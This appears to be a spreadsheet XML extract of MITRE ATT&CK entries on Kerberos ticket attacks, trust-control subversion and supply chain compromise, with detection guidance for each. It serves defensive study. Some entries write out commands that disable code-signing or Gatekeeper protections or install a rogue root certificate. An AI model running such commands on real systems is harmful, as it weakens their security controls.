  <si>
    <t>Steal or Forge Kerberos Tickets: AS-REP Roasting</t>
  </si>
  <si>
    <t>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)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</si>
  <si>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https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request</t>
  </si>
  <si>
    <t>Dan Nutting, @KerberToast; Jacques Pluviose, @Jacqueswildy_IT; James Dunn, @jamdunnDFW, EY; Swapnil Kumbhar</t>
  </si>
  <si>
    <t>T1558.001</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Golden Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) 
Using a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)
The KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/001</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
</t>
  </si>
  <si>
    <t>Itamar Mizrahi, Cymptom</t>
  </si>
  <si>
    <t>T1558.003</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Kerberoasting</t>
  </si>
  <si>
    <t>Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) 
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same attack could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/003</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>T1558.002</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Silver Ticket</t>
  </si>
  <si>
    <t>Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)
Silver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)
Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1558/002</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.
Adversaries may attempt to subvert these trust mechanisms. The method adversaries use will depend on the specific mechanism they seek to subvert. Adversaries may conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017) Adversaries may also create or steal code signing certificates to acquire trust on target systems.(Citation: Securelist Digital Certificates)(Citation: Symantec Digital Certificates) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553</t>
  </si>
  <si>
    <t xml:space="preserve">Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec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deselected.(Citation: SpectorOps Subverting Trust Sept 2017)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 </t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Autoruns Analysis, Digital Certificate Validation, Process whitelisting, User Mode Signature Validation, Windows User Account Control</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.
Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) 
Code signing certificates may be used to bypass security policies that require signed code to execute on a system. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; on Windows and &lt;code&gt;csrutil disable&lt;/code&gt; on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying &lt;code&gt;g_CiOptions&lt;/code&gt; to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as &lt;code&gt;HKCU\Software\Policies\Microsoft\Windows NT\Driver Signing&lt;/code&gt;. Modifications to the code signing policy of a system are likely to be rare.</t>
  </si>
  <si>
    <t>Abel Morales, Exabeam</t>
  </si>
  <si>
    <t>Application control, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes that signify programs are from untrusted sources to subvert Gatekeeper controls. In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called &lt;code&gt;com.apple.quarantine&lt;/code&gt;. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution. 
Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, it is possible to avoid setting this flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command &lt;code&gt;xattr /path/to/MyApp.app&lt;/code&gt; for &lt;code&gt;com.apple.quarantine&lt;/code&gt;. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, &lt;code&gt;sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app&lt;/code&gt;. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)
In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1553.004</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Install Root Certificate</t>
  </si>
  <si>
    <t>Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)
Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)
Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)
In macOS, the Ay MaMi malware uses &lt;code&gt;/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert&lt;/code&gt; to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/004</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. (Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl. (Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List. (Citation: Microsoft Sigcheck May 2017)
Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Itzik Kotler, SafeBreach; Matt Graeber, @mattifestation, SpecterOps; Red Canary; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1553.005</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named &lt;code&gt;Zone.Identifier&lt;/code&gt; with a specific value known as the MOTW.(Citation: Microsoft Zone.Identifier 2020) Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)(Citation: Intezer Russian APT Dec 2020)
Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.(Citation: Beek Use of VHD Dec 2020)(Citation: Outflank MotW 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/005</t>
  </si>
  <si>
    <t>Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Metadata</t>
  </si>
  <si>
    <t>T1553.003</t>
  </si>
  <si>
    <t>Subvert Trust Controls: SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)
Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all  (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)
Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}&lt;/code&gt; that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).
* Modifying the &lt;code&gt;Dll&lt;/code&gt; and &lt;code&gt;FuncName&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}&lt;/code&gt; that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.
* Modifying the &lt;code&gt;DLL&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; Registry values in &lt;code&gt;HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}&lt;/code&gt; that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1553/003</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matt Graeber, @mattifestation, SpecterOps</t>
  </si>
  <si>
    <t>Application control, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.
Supply chain compromise can take place at any stage of the supply chain including:
* Manipulation of development tools
* Manipulation of a development environment
* Manipulation of source code repositories (public or private)
* Manipulation of source code in open-source dependencies
* Manipulation of software update/distribution mechanisms
* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) 
* Replacement of legitimate software with modified versions
* Sales of modified/counterfeit products to legitimate distributors
* Shipment interdiction
While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Veeral Patel</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/003</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</t>
  </si>
  <si>
    <t>T1195.001</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)  
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t xml:space="preserve">Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. </t>
  </si>
  <si>
    <t>T1195.002</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Supply Chain</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
